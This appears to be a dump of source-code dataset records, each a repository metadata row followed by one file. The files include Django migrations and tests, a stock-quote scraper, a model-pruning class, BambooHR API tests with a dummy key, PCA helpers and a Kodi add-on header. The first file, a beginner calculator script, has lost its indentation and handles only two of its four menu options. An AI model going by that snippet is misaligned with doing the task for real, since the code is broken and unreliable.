4a5c5376aa7ce609fdb64cecfb2774f44dbc8725 | cf0480eb13906bf6e2c46bfe09b864ee9bbf6776 | /Functions/Calc/Calc_1.py | 3b600966f2c62976f2522ee032f37f2d17a06b1c | [] | no_license | ravi4all/Python_JuneRegular_Evening | f7afb665541b88a9cb6ce89a488a32120f63dd6b | ad6e17c4acdcb2c669ba0508b12aeca8bdab8976 | refs/heads/master | 2020-03-20T21:20:36.763561 | 2018-07-06T11:26:52 | 2018-07-06T11:26:52 | 137,736,114 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | print("""
1. Add
2. Sub
3. Mul
4. Div
""")
user_choice = input("Enter your choice : ")
num_1 = int(input("Enter first number : "))
num_2 = int(input("Enter second number : "))
if user_choice == "1":
result = num_1 + num_2
print("Sum is",result)
elif user_choice == "2":
result = num_1 - num_2
print("Diff is", result)
| [
"noreply@github.com"
] | noreply@github.com |
abc693b61aa74343a53bf216a81b234375a2d68f | a50b7b55ce92e4ad9e6020184dfd1a90319374ab | /src/veggies/migrations/0010_remove_food_to_substitute_show_on_view.py | 6469e9c072ec08748a1f59fe63d3078472adbd17 | [] | no_license | AdamGinna/DockerVeggies | bdb48af93b06a67a8a86a478585dedd80e236f5c | c43bd382775b46e566e7296b7a2f541453539bfd | refs/heads/master | 2023-04-24T20:22:38.618557 | 2021-05-03T17:42:51 | 2021-05-03T17:42:51 | 361,412,407 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | # Generated by Django 2.2.7 on 2020-04-01 11:10
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('veggies', '0009_auto_20200401_1107'),
]
operations = [
migrations.RemoveField(
model_name='food_to_substitute',
name='show_on_view',
),
]
| [
"adam.ginna.work@gmail.com"
] | adam.ginna.work@gmail.com |
2c80f7d7ae8727f7b54b96f32435206ead344557 | 99a018f99af4ebff2e1ac6029ad6307ffa558e37 | /src/powergrader/processors/base.py | 7f34578f72617911f71784dd8ff7c1fa1e6da0ef | [] | no_license | kuboschek/powergrader | e558f7fdb9b55624d25076bec388359e47aa073c | eef6d813fa064b8a3921fea5047d71c5f1891475 | refs/heads/master | 2021-05-03T07:53:58.017849 | 2016-05-26T18:35:07 | 2016-05-26T18:35:07 | 53,963,853 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 749 | py | #!/usr/bin/env python
import datetime
from helpers import get_ex_dir
class BaseProcessor(object):
"""Do nothing processor."""
def __init__(self, exname, filenames, testcases):
self.exname = exname
self.ex_dir = get_ex_dir(exname)
self.filenames = filenames
self.testcases = testcases
def get_name(self):
return "base"
def run(self, uname):
"""Generate list of deductions"""
out = []
return out
def process(self, uname):
"""Output object of deductions"""
out = {
'generated-by': self.get_name(),
'timestamp': datetime.datetime.now().isoformat(),
'deductions': self.run(uname)
}
return out
| [
"x32000@gmail.com"
] | x32000@gmail.com |
3d7d70c65db095cbce34a2025152ea993cae07f3 | c9ab887d14e6a9a003bd7033a2c2af08c4a6b1d6 | /hvenv/Scripts/django-admin.py | 8fd4a15b766d207c1e5311cbc5444d177472d61a | [] | no_license | haezoo/my-first-blog | 2c74991b157099e4eb7a22cc8b4eb27e61c6019b | deebff8ecdcd883db4669c2080b941584f607830 | refs/heads/master | 2020-04-10T10:26:49.484791 | 2018-12-08T21:44:38 | 2018-12-08T21:44:38 | 160,966,738 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | #!c:\djangogirls\hvenv\scripts\python.exe
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"heatherltoll@gmail"
] | heatherltoll@gmail |
df6cbd2525ccf0b8c651166827b6e67a7a5d0630 | f30a1dcb8a4134aed5f1635799ccceedb590d77a | /kmeans_knn_ratingPrediction_moviePrediction_analysis_000/misc/build_num_ratings_per_movie.py | 58dc8d490857c41df3ce193969d62f9484281234 | [] | no_license | Willian-Girao/Clustering-Recommendation-Netflix | aecc951106d3dfc827b24ca6f6182a19a13510c4 | f4655c93803d9b4b3f7a337fc54cc4c6980b6563 | refs/heads/master | 2020-06-10T03:38:31.222618 | 2019-09-22T17:56:39 | 2019-09-22T17:56:39 | 193,571,046 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,193 | py | #!/usr/bin/env python
import os
import csv
# Getting all files within target directory.
movies_files = os.listdir('training_set/')
# opening user file
final_file = open("movies_rateCount.txt","a+")
# List with rating to be sorted
ratings_array = []
# Looping through each file found.
for movie_file in movies_files:
# Open current traning file.
movie_ratings = open('training_set/' + movie_file, "r")
# Counting ratings for this movie
ratings_count = 0
movie_id = ""
movie_id_retrieved = 0
for line in movie_ratings:
if movie_id_retrieved == 0:
movie_id = line.replace(':', '')
movie_id = movie_id.replace('\n','')
movie_id_retrieved = 1
ratings_count += 1
# removing movie_id that was accounted
ratings_count -= 1
# Saving movie id and rating count to array
ratings_array.append([str(movie_id), int(ratings_count)])
# Closing current movie file
movie_ratings.close()
print("> file '" + movie_file + "' finished parsing.")
# Sorting array with rating
ratings_array.sort(key=lambda x:x[1], reverse=True)
# Saving to file
for data in ratings_array:
final_file.write(str(data[0]) + " " + str(data[1]) + "\n")
# closing final file
final_file.close()
| [
"williansoaresgirao@gmail.com"
] | williansoaresgirao@gmail.com |
f6e85541c1404ada5258f7f24c2b9c8480cd87f4 | ccf57c5b03b602ee0a2f13a9299958d9d5a30e91 | /根据股票代码获取当前数据.py | 44fe0ab70287253b330552b111ff3a7ab42e5a3f | [] | no_license | mrwtx1618/py_all | e4e4c0214223d44ff4d5499311b87ae5cfe33dc9 | fa3955382229f91c739bda2d57d0b42b885f9c9b | refs/heads/master | 2021-08-28T14:08:27.578827 | 2017-12-12T12:18:24 | 2017-12-12T12:18:24 | 113,982,790 | 0 | 0 | null | null | null | null | GB18030 | Python | false | false | 2,228 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib2
import re
import datetime
def getStockInfo(url):
"""根据url获取信息"""
stockList = []
request = urllib2.Request(url)
response = urllib2.urlopen(request)
stockStr = response.read()
stockList = stockStr.split(',')
return stockList
def printStock(List):
"""打印相关信息"""
print '***********price*****************' + List[1]
print '***********float_price***********' + List[2]
print '***********float_perct***********' + List[3] + '%'
print '***********succ_unit*************' + List[4]+' shou'
print '***********succ_price************' + List[5]
def getUrlByCode(code):
"""根据代码获取详细的url"""
url = ''
stockCode = ''
if code == 'sh':
url = 'http://hq.sinajs.cn/list=s_sh000001'
elif code == 'sz':
url = 'http://hq.sinajs.cn/list=s_sz399001'
elif code == 'cyb':
url = 'http://hq.sinajs.cn/list=s_sz399006'
else:
pattern = re.compile(r'^60*')
match = pattern.match(code)
if match:
stockCode = 'sh'+ code
else:
stockCode = 'sz' + code
url = 'http://hq.sinajs.cn/list=s_'+stockCode
return url
#输入stock代码输出对应的价格信息
#code = raw_input('code: ')
codeDict = {
'sh' : 'shang hai zq',
'sz' : 'shen zheng zq',
'cyb' : 'chang ye ban',
'601788' : 'guang da zheng quan',
'000651' : 'ge li dian qi',
}
#http://hq.sinajs.cn/list=s_sh000001 (上海大盘查询)
#http://hq.sinajs.cn/list=s_sz399001 (深圳大盘查询)
count = 0;
while (count<=100):#循环100次后再退出
# 循环字典
for key in codeDict:
print key + '--'+codeDict[key]
code = raw_input('please select a code: ')
now_time = datetime.datetime.now()
#打印该code的信息
url = getUrlByCode(code)
stockInfo = getStockInfo(url)
#print stockInfo
printStock(stockInfo)
end_time = datetime.datetime.now()
costTime = (end_time - now_time).seconds
print '总共花费时间'+str(costTime)+'秒'
count +=1 | [
"13110180012@fudan.edu.cn"
] | 13110180012@fudan.edu.cn |
b73c3fb36f61b44c607e0a663ff232dd7a06ce78 | 3cab75b3c7065c4c6c021ceb41564bfa941b53e8 | /lists/tests.py | a940a569e58435a2481d62f0a7facc1ade5195c2 | [
"MIT"
] | permissive | linzeyang/testing_goat | 1809020791946e4b39d68ecda062612144309afb | 9e3ff82d2d24383be4dd2c693ac5a962f503c2c5 | refs/heads/master | 2021-01-23T16:35:37.068794 | 2014-02-11T14:42:43 | 2014-02-11T14:42:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,168 | py | from django.core.urlresolvers import resolve
from django.test import TestCase
from django.http import HttpRequest
from django.template.loader import render_to_string
from lists.models import Item, List
from lists.views import home_page
# Create your tests here.
class ListAndItemModelsTest(TestCase):
def test_saving_and_retrieving_items(self):
list_ = List()
list_.save()
first_item = Item()
first_item.text = 'The first (ever) list item'
first_item.list = list_
first_item.save()
second_item = Item()
second_item.text = 'Item the second'
second_item.list = list_
second_item.save()
saved_list = List.objects.first()
self.assertEqual(saved_list, list_)
saved_items = Item.objects.all()
self.assertEqual(saved_items.count(), 2)
first_saved_item = saved_items[0]
second_saved_item = saved_items[1]
self.assertEqual(first_saved_item.text, 'The first (ever) list item')
self.assertEqual(first_saved_item.list, list_)
self.assertEqual(second_saved_item.text, 'Item the second')
self.assertEqual(second_saved_item.list, list_)
class HomePageTest(TestCase):
def test_root_url_resolves_to_home_page_view(self):
found = resolve('/')
self.assertEqual(found.func, home_page)
def test_home_page_returns_correct_html(self):
request = HttpRequest()
response = home_page(request)
expect_html = render_to_string('home.html')
self.assertEqual(response.content.decode(), expect_html)
class ListViewTest(TestCase):
def test_uses_list_template(self):
list_ = List.objects.create()
response = self.client.get('/lists/%d/' % list_.id)
self.assertTemplateUsed(response, 'list.html')
def test_displays_only_items_for_that_list(self):
correct_list = List.objects.create()
Item.objects.create(text='itemey 1', list=correct_list)
Item.objects.create(text='itemey 2', list=correct_list)
other_list = List.objects.create()
Item.objects.create(text='other list item 1', list=other_list)
Item.objects.create(text='other list item 2', list=other_list)
response = self.client.get('/lists/%d/' % correct_list.id)
self.assertContains(response, 'itemey 1')
self.assertContains(response, 'itemey 2')
self.assertNotContains(response, 'other list item 1')
self.assertNotContains(response, 'other list item 2')
class NewListTest(TestCase):
def test_saving_a_POST_request(self):
response = self.client.post('/lists/new',
data={'item_text': 'A new list item'})
self.assertEqual(Item.objects.count(), 1)
new_item = Item.objects.first()
self.assertEqual(new_item.text, "A new list item")
def test_redirects_after_POST(self):
response = self.client.post('/lists/new',
data={'item_text': 'A new list item'})
new_list = List.objects.first()
self.assertRedirects(response, '/lists/%d/' % new_list.id)
class NewItemTest(TestCase):
def test_can_save_a_POST_request_to_an_existing_list(self):
other_list = List.objects.create()
correct_list = List.objects.create()
self.client.post('/lists/%d/new_item' % correct_list.id,
data={'item_text': 'A new item for an existing list'})
self.assertEqual(Item.objects.count(), 1)
new_item = Item.objects.first()
self.assertEqual(new_item.text, 'A new item for an existing list')
self.assertEqual(new_item.list, correct_list)
def test_redirects_to_list_view(self):
other_list = List.objects.create()
correct_list = List.objects.create()
response = self.client.post('/lists/%d/new_item' % correct_list.id,
data={
'item_text': 'A new item for an existing list'
})
self.assertRedirects(response, '/lists/%d/' % correct_list.id)
| [
"zeyanglin2013@gmail.com"
] | zeyanglin2013@gmail.com |
030567038e4e134b0730539fcc924b6029a5698b | c8675ec0ac3e7036990aa255c1f82e476e9bed7b | /fineprune/mid_datasetgrad_optim.py | 946514ad47b11ff6105e82f704315e4429c97e51 | [] | no_license | ziqi-zhang/Renofeation | c74bfc040be6c131d250cf8a2bb2ab7c09e69ad0 | a2f9ad692799692d3db07fca30d25c3c05923449 | refs/heads/master | 2023-07-27T18:51:48.093837 | 2021-09-02T02:56:07 | 2021-09-02T02:56:07 | 269,360,779 | 0 | 0 | null | 2020-06-04T13:01:00 | 2020-06-04T13:00:59 | null | UTF-8 | Python | false | false | 4,258 | py | import os
import os.path as osp
import sys
import time
import argparse
from pdb import set_trace as st
import json
import random
from functools import partial
from operator import itemgetter
from heapq import nsmallest
import copy
import torch
import numpy as np
import torchvision
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torchcontrib
from torchvision import transforms
from advertorch.attacks import LinfPGDAttack
from dataset.cub200 import CUB200Data
from dataset.mit67 import MIT67Data
from dataset.stanford_dog import SDog120Data
from dataset.caltech256 import Caltech257Data
from dataset.stanford_40 import Stanford40Data
from dataset.flower102 import Flower102Data
from model.fe_resnet import resnet18_dropout, resnet50_dropout, resnet101_dropout
from model.fe_mobilenet import mbnetv2_dropout
from model.fe_resnet import feresnet18, feresnet50, feresnet101
from model.fe_mobilenet import fembnetv2
from eval_robustness import advtest, myloss
from utils import *
from fineprune.finetuner import Finetuner
from fineprune.global_datasetgrad_optim_iter import GlobalDatasetGradOptimIter
class MidDeltaW(GlobalDatasetGradOptimIter):
def __init__(
self,
args,
model,
teacher,
train_loader,
test_loader,
):
super(MidDeltaW, self).__init__(
args, model, teacher, train_loader, test_loader
)
def conduct_prune(
self,
low_ratio, ratio_interval,
):
model = self.model.cpu()
total = 0
for name, module in model.named_modules():
if ( isinstance(module, nn.Conv2d) ):
total += module.weight.data.numel()
conv_weights = torch.zeros(total)
index = 0
for name, module in model.named_modules():
if ( isinstance(module, nn.Conv2d) ):
size = module.weight.data.numel()
conv_weights[index:(index+size)] = module.weight.grad_log.view(-1).abs().clone()
index += size
y, i = torch.sort(conv_weights)
low_thre_index = int(total * low_ratio)
low_thre = y[low_thre_index]
high_thre_index = int(total * (low_ratio+ratio_interval))
if high_thre_index >= len(y):
high_thre_index = len(y)-1
high_thre = y[high_thre_index]
log = f"Pruning threshold: {low_thre:.4f} to {high_thre:.4f}"
self.prune_record(log)
pruned = 0
zero_flag = False
for name, module in model.named_modules():
if ( isinstance(module, nn.Conv2d) ):
# Prune conv1 is better
# if name == "conv1":
# continue
weight_copy = module.weight.grad_log.abs().clone()
mask = weight_copy.gt(high_thre).float() + weight_copy.lt(low_thre).float()
pruned = pruned + mask.numel() - torch.sum(mask)
# np.random.shuffle(mask)
module.weight.data.mul_(mask)
if int(torch.sum(mask)) == 0:
zero_flag = True
remain_ratio = int(torch.sum(mask)) / mask.numel()
log = (f"layer {name} \t total params: {mask.numel()} \t "
f"remaining params: {int(torch.sum(mask))}({remain_ratio:.2f})")
self.prune_record(log)
if zero_flag:
raise RuntimeError("There exists a layer with 0 parameters left.")
log = (f"Total conv params: {total}, Pruned conv params: {pruned}, "
f"Pruned ratio: {pruned/total:.2f}")
self.prune_record(log)
self.model = model.cuda()
def snip_weight_prune(self, low_ratio, ratio_interval):
self.process_epoch()
# self.normalize_ranks()
self.conduct_prune(low_ratio, ratio_interval)
def init_prune(self):
low_ratio = self.args.weight_init_prune_ratio
ratio_interval = self.args.weight_ratio_per_prune
log = f"Init prune ratio {low_ratio:.2f}, interval {ratio_interval:.2f}"
self.prune_record(log)
self.snip_weight_prune(low_ratio, ratio_interval)
self.check_param_num()
| [
"ziqi_zhang@pku.edu.cn"
] | ziqi_zhang@pku.edu.cn |
d2f30985dff53befafcdbff29343246a2e7fff4c | a78c8cb4a3c41f39edbfd150467ccc4b837b1696 | /python_crash_course/chapter_3_lists/bicycles.py | 0ed3e0a37d0b866b3575a16481a4b0bb0f577812 | [] | no_license | shayroy/ChamplainVR | f1ed509edbfb4a735092dd8960d5c6860ea8055b | 3d9d8318024fbfb25a8bbdb5315072fe148c5311 | refs/heads/master | 2020-04-03T16:18:46.434730 | 2019-03-08T23:17:15 | 2019-03-08T23:17:15 | 155,399,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | bicycles = ['trek', 'cannondale', 'redline', 'specialized']
print(bicycles)
print(bicycles[0])
print(bicycles[0].title())
print(bicycles[1])
print(bicycles[3])
print(bicycles[-1])
message = "My first bicycle was a " + bicycles[0].title() + "."
print(message) | [
"2shayroy@gmail.com"
] | 2shayroy@gmail.com |
f57ba3f42f0fa8e30c8a1dd086d3ee1c1ee35d4e | a68883f6cdb5e607d89b7afa94e68023c132055c | /tests/test_time_off.py | bbd96fbd8ef4da14a073179a345c1cb7333281fe | [
"MIT"
] | permissive | JosephvB-JBA/PyBambooHR | 2e62e246ffe4eaa85e824aa6a232f502e3395747 | e3c83f9bfcd8f6703e220462ea1aa06703632441 | refs/heads/master | 2020-11-28T05:22:33.919602 | 2019-12-24T09:44:56 | 2019-12-24T09:44:56 | 229,715,301 | 0 | 0 | MIT | 2019-12-24T09:44:57 | 2019-12-23T09:00:37 | null | UTF-8 | Python | false | false | 6,169 | py | """Unittests for time off api
"""
import httpretty
import os
import sys
import unittest
from json import dumps
from requests import HTTPError
# Force parent directory onto path
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from PyBambooHR import PyBambooHR
class test_time_off(unittest.TestCase):
# Used to store the cached instance of PyBambooHR
bamboo = None
def setUp(self):
if self.bamboo is None:
self.bamboo = PyBambooHR(subdomain='test', api_key='testingnotrealapikey')
@httpretty.activate
def test_get_time_off_requests(self):
body = [{"id": "1342", "employeeId": "4", "status": {"lastChanged": "2019-09-12", "lastChangedByUserId": "2369", "status": "approved"}, "name": "Charlotte Abbott", "start": "2019-05-30", "end": "2019-06-01", "created": "2019-09-11", "type": {"id": "78", "name": "Vacation", "icon": "palm-trees"}, "amount": {"unit": "hours", "amount": "24"}, "actions": {"view": True, "edit": True, "cancel": False, "approve": False, "deny": False, "bypass": False}, "dates": {"2019-05-30": "24"}, "notes": {"manager": "Home sick with the flu."}}]
httpretty.register_uri(httpretty.GET,
"https://api.bamboohr.com/api/gateway.php/test/v1/time_off/requests",
body=dumps(body),
content_type="application/json")
response = self.bamboo.get_time_off_requests()
self.assertIsNotNone(response)
self.assertTrue(len(response) > 0)
self.assertEquals(response[0]['id'], '1342')
return
@httpretty.activate
def test_get_time_off_policies(self):
body = [{'id': '70', 'timeOffTypeId': '77', 'name': 'Testing Manual Policy', 'effectiveDate': None, 'type': 'manual'}]
httpretty.register_uri(httpretty.GET,
"https://api.bamboohr.com/api/gateway.php/test/v1/meta/time_off/policies",
body=dumps(body),
content_type="application/json")
response = self.bamboo.get_time_off_policies()
self.assertIsNotNone(response)
self.assertTrue(len(response) > 0)
self.assertEquals(response[0]['id'], '70')
return
@httpretty.activate
def test_get_time_off_types(self):
body = {'timeOffTypes': [{'id': '78', 'name': 'Vacation', 'units': 'hours', 'color': None, 'icon': 'palm-trees'}]}
httpretty.register_uri(httpretty.GET,
"https://api.bamboohr.com/api/gateway.php/test/v1/meta/time_off/types",
body=dumps(body),
content_type="application/json")
response = self.bamboo.get_time_off_types()
self.assertIsNotNone(response)
self.assertTrue(len(response) > 0)
self.assertEquals(response[0]['id'], '78')
return
@httpretty.activate
def test_create_time_off_request(self):
body = {'id': '1675', 'employeeId': '111', 'start': '2040-02-01', 'end': '2040-02-02', 'created': '2019-12-24', 'status': {'status': 'requested', 'lastChanged': '2019-12-24 02:29:45', 'lastChangedByUserId': '2479'}, 'name': 'xdd xdd', 'type': {'id': '78', 'name': 'Vacation'}, 'amount': {'unit': 'hours', 'amount': '2'}, 'notes': {'employee': 'Going overseas with family', 'manager': 'Enjoy!'}, 'dates': {'2040-02-01': '1', '2040-02-02': '1'}, 'comments': [{'employeeId': '111', 'comment': 'Enjoy!', 'commentDate': '2019-12-24', 'commenterName': 'Test use'}], 'approvers': [{'userId': '2479', 'displayName': 'Test user', 'employeeId': '111', 'photoUrl': 'https://resources.bamboohr.com/employees/photos/initials.php?initials=testuser'}], 'actions': {'view': True, 'edit': True, 'cancel': True, 'approve': True, 'deny': True, 'bypass': True}, 'policyType': 'discretionary', 'usedYearToDate': 0, 'balanceOnDateOfRequest': 0}
httpretty.register_uri(httpretty.PUT,
"https://api.bamboohr.com/api/gateway.php/test/v1/employees/111/time_off/request",
body=dumps(body),
content_type="application/json")
data = {
'status': 'requested',
'employee_id': '111',
'start': '2040-02-01',
'end': '2040-02-02',
'timeOffTypeId': '78',
'amount': '2',
'dates': [
{ 'ymd': '2040-02-01', 'amount': '1' },
{ 'ymd': '2040-02-02', 'amount': '1' }
],
'notes': [
{ 'type': 'employee', 'text': 'Going overseas with family' },
{ 'type': 'manager', 'text': 'Enjoy!' }
]
}
response = self.bamboo.create_time_off_request(data)
self.assertIsNotNone(response)
self.assertEquals(response['id'], '1675')
return
@httpretty.activate
def test_update_time_off_request_status(self):
body = {'id': '1675', 'employeeId': '111', 'start': '2040-02-01', 'end': '2040-02-02', 'created': '2019-12-24', 'status': {'status': 'declined', 'lastChanged': '2019-12-24 02:29:45', 'lastChangedByUserId': '2479'}, 'name': 'xdd xdd', 'type': {'id': '78', 'name': 'Vacation'}, 'amount': {'unit': 'hours', 'amount': '2'}, 'notes': {'employee': 'Going overseas with family', 'manager': 'Enjoy!'}, 'dates': {'2040-02-01': '1', '2040-02-02': '1'}, 'comments': [{'employeeId': '111', 'comment': 'Enjoy!', 'commentDate': '2019-12-24', 'commenterName': 'Test use'}], 'approvers': [{'userId': '2479', 'displayName': 'Test user', 'employeeId': '111', 'photoUrl': 'https://resources.bamboohr.com/employees/photos/initials.php?initials=testuser'}], 'actions': {'view': True, 'edit': True, 'cancel': True, 'approve': True, 'deny': True, 'bypass': True}, 'policyType': 'discretionary', 'usedYearToDate': 0, 'balanceOnDateOfRequest': 0}
httpretty.register_uri(httpretty.PUT,
"https://api.bamboohr.com/api/gateway.php/test/v1/time_off/requests/1675/status",
body=dumps(body),
content_type="application/json")
data = {
'status': 'declined',
'note': 'Have fun!'
}
response = self.bamboo.update_time_off_request_status(body['id'] ,data)
self.assertIsNotNone(response)
self.assertTrue(response)
return | [
"joevanbo@pm.me"
] | joevanbo@pm.me |
a7db7a35a129dddef9b0cb830716ebca4fed85be | 42366c1e36038bf879652b4f4c45c6105209a738 | /snakemake/wrapper.py | 52b1c95f9256a8db894ea389c38ad40fd4bec165 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | endrebak/snakemake_dev | e22989e40d475250a1f6e44421290b75dcaf6651 | 846cad1273de7cf43a25fc210174ce43dfd45a8a | refs/heads/master | 2021-01-13T16:01:30.593695 | 2016-12-14T08:21:22 | 2016-12-14T08:21:22 | 76,775,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,340 | py | __author__ = "Johannes Köster"
__copyright__ = "Copyright 2016, Johannes Köster"
__email__ = "koester@jimmy.harvard.edu"
__license__ = "MIT"
import os
import posixpath
from snakemake.script import script
def is_script(path):
return path.endswith("wrapper.py") or path.endswith("wrapper.R")
def get_path(path, prefix=None):
if not (path.startswith("http") or path.startswith("file:")):
if prefix is None:
prefix = "https://bitbucket.org/snakemake/snakemake-wrappers/raw/"
path = prefix + path
return path
def get_script(path, prefix=None):
path = get_path(path)
if not is_script(path):
path += "/wrapper.py"
return path
def get_conda_env(path):
path = get_path(path)
if is_script(path):
# URLs and posixpaths share the same separator. Hence use posixpath here.
path = posixpath.dirname(path)
return path + "/environment.yaml"
def wrapper(path, input, output, params, wildcards, threads, resources, log, config, rulename, conda_env, prefix):
"""
Load a wrapper from https://bitbucket.org/snakemake/snakemake-wrappers under
the given path + wrapper.py and execute it.
"""
path = get_script(path, prefix=prefix)
script(path, "", input, output, params, wildcards, threads, resources, log, config, rulename, conda_env)
| [
"johannes.koester@tu-dortmund.de"
] | johannes.koester@tu-dortmund.de |
5d0ed9ab08f7f7ae03317f6eb8e55318594ebfa4 | d4d6576e67ba1a935e28062835e56636fb7b6bfc | /priorgen/pca_utils.py | 05e43c552c5879146cf3f036c106616fa493ebaa | [
"MIT"
] | permissive | joshjchayes/PriorGen | caf80f49b4429345fd688c55d1eadd0a25df7cf8 | 228be0b06dca29ad2ad33ae216f494eaead6161f | refs/heads/master | 2023-05-26T00:51:14.875596 | 2021-06-07T14:58:26 | 2021-06-07T14:58:26 | 211,059,123 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,487 | py | '''
pca_utils.py
Module containing functions to run PCAs, and generate diagnostic plots
'''
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
import numpy as np
def run_PCA(parameters, observables, n_components):
'''
Runs a principal component analysis to reduce dimensionality of
observables.
Parameters
----------
parameters : array_like, shape (N, M)
The physical parameter values for each point we are training the
ML classifier on. N is the number of points, whilst M is the
physical value for each parameter. These are all assumed to be in
the same order. We assume that there are M variables in the model,
and that none of them are constants.
observables : array_like, shape (N, X)
The observables associated with each of the parameters. We assume
that the observables are 1D arrays where each entry is directly
comparable. For example, it could be F(t), but where each entry is
at the same value of t.
n_components : int
The number of principal components to keep
Returns
-------
pca : sklearn.decomposition.PCA
The scikit-learn PCA object
reduced_d_observables : array_like, shape(N, n_components)
The observables after PCA has been applied to them
'''
pca = PCA(n_components=n_components)
fitted_pca = pca.fit(observables)
reduced_d_observables = fitted_pca.transform(observables)
return pca, reduced_d_observables
def pca_plot(parameters, observables, n_components, save=True,
save_path='PCA_plot.pdf'):
'''
Produces a plot of the explained variance of the first n_components
principal components, along with a cumulative variance
Parameters
----------
parameters : array_like, shape (N, M)
The physical parameter values for each point we are training the
ML classifier on. N is the number of points, whilst M is the
physical value for each parameter. These are all assumed to be in
the same order. We assume that there are M variables in the model,
and that none of them are constants.
observables : array_like, shape (N, X)
The observables associated with each of the parameters. We assume
that the observables are 1D arrays where each entry is directly
comparable. For example, it could be F(t), but where each entry is
at the same value of t.
n_components : int
The number of principal components to keep
save : bool, optional:
If True, will save the output figure to save_path. Default is True.
save_path : str, optional
If save is True, this is the path that the figures will
be saved to. Default is 'PCA_plot.pdf'.
Returns
-------
fig : matplotlib.Figure
The pca plot
'''
pca, _ = run_PCA(parameters, observables, n_components)
variance = pca.explained_variance_ratio_
cumulative_variance = np.cumsum(variance).round(4)
fig, ax = plt.subplots(2,1, sharex=True)
# Plot the
ax[0].bar(np.arange(n_components), variance, label='Associated variance')
#ax[0].set_xlabel('Principal component')
ax[0].set_ylabel('Fractional variance')
ax[0].set_yscale('log')
ax[1].plot(np.arange(n_components), cumulative_variance, 'r', label='Cumulative variance')
ax[1].set_xlabel('Principal component')
ax[1].set_ylabel('Cumulative variance')
ax[1].margins(x=0.01)
fig.tight_layout()
fig.subplots_adjust(hspace=0)
if save:
fig.savefig(save_path)
return fig
def find_required_components(parameters, observables, variance):
'''
Calculates the number of principal components required for reduced
dimensionality obserables to contain a given fraction of explained variance
Parameters
----------
parameters : array_like, shape (N, M)
The physical parameter values for each point we are training the
ML classifier on. N is the number of points, whilst M is the
physical value for each parameter. These are all assumed to be in
the same order. We assume that there are M variables in the model,
and that none of them are constants.
observables : array_like, shape (N, X)
The observables associated with each of the parameters. We assume
that the observables are 1D arrays where each entry is directly
comparable. For example, it could be F(t), but where each entry is
at the same value of t.
variance : float
The fraction of explained variance you want the principal components
to contain
Returns
-------
n_components : int
The smallest number of principal comonents required to contain the
specified fraction of explained variance
'''
if not 0 <= variance < 1:
raise ValueError('variance must be between 0 and 1')
# run PCA and keep all components
pca, _ = run_PCA(parameters, observables, None)
cumulative_variance = np.cumsum(pca.explained_variance_ratio_)
# The +1 is required because the first part finds an index where the
# cumulative explained variance ratio is larger than the threshold
# and the indices start from 0
n_PCs = np.where(cumulative_variance >= variance)[0][0] + 1
if n_PCs > 30:
print('WARNING: {} principal components are required - this may lead to slow run times.'.format(n_PCs))
return n_PCs
| [
"joshjchayes@gmail.com"
] | joshjchayes@gmail.com |
ccd9a83891610d364cd5354c03ff16bc5b6dcaf1 | 87367fe2ee0203a88fb911e476818d7b17ec932f | /shop/migrations/0010_auto_20200322_0621.py | a03c0f2483ce917a205d6d0cdde9ff5c9c20b983 | [] | no_license | brianmurim9/ecommerce | 08808d11c785d91b8afeed19dbf7ee9af9411fa3 | 7dbc9ba5d80771e799f55fb2ced51cd0d2c37d1f | refs/heads/main | 2023-02-22T20:55:31.714612 | 2021-01-16T06:13:33 | 2021-01-16T06:13:33 | 330,094,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 577 | py | # Generated by Django 3.0.4 on 2020-03-22 13:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('shop', '0009_auto_20200322_0616'),
]
operations = [
migrations.AlterField(
model_name='orderitem',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"noreply@github.com"
] | noreply@github.com |
f3ed0316d367ac2d8180e59a9ef4e265df2eb72b | d78dfc5089717fc242bbd7097f507d811abb4260 | /French/plugin.video.fr.filmsdefrance/streamcomplet_common.py | 01bb111cb943894548d6f78bf38f215525777056 | [] | no_license | tustxk/AddOnRepo | 995b980a9ec737e2c25bed423fc83f710c697e40 | 6b86a06cb37e6e10b4119584dd7311ebc2318e54 | refs/heads/master | 2022-10-08T21:34:34.632346 | 2016-10-28T09:48:01 | 2016-10-28T09:48:01 | 70,684,775 | 1 | 1 | null | 2022-10-01T16:27:13 | 2016-10-12T09:31:16 | Python | UTF-8 | Python | false | false | 69,201 | py | ### ############################################################################################################
### #
### # Author: # The Highway
### # Description: # Common File
### #
### ############################################################################################################
### ############################################################################################################
### Imports ###
import xbmc,xbmcplugin,xbmcgui,xbmcaddon,xbmcvfs
import os,sys,string,StringIO,logging,random,array,time,datetime,re
import urllib,urllib2,htmllib
from streamcomplet_config import *
#import urlresolver
#import copy
#try: import json
#except ImportError: import simplejson as json
#try: import StorageServer
#except: import storageserverdummy as StorageServer
#cache = StorageServer.StorageServer(plugin_id)
try: from addon.common.net import Net
except:
try: from t0mm0.common.net import Net
except:
try: from c_t0mm0_common_net import Net
except: pass
try: from addon.common.addon import Addon
except:
try: from t0mm0.common.addon import Addon
except:
try: from c_t0mm0_common_addon import Addon
except: pass
#try: from sqlite3 import dbapi2 as sqlite; print "Loading sqlite3 as DB engine"
#except: from pysqlite2 import dbapi2 as sqlite; print "Loading pysqlite2 as DB engine"
#try: from script.module.metahandler import metahandlers
#except: from metahandler import metahandlers
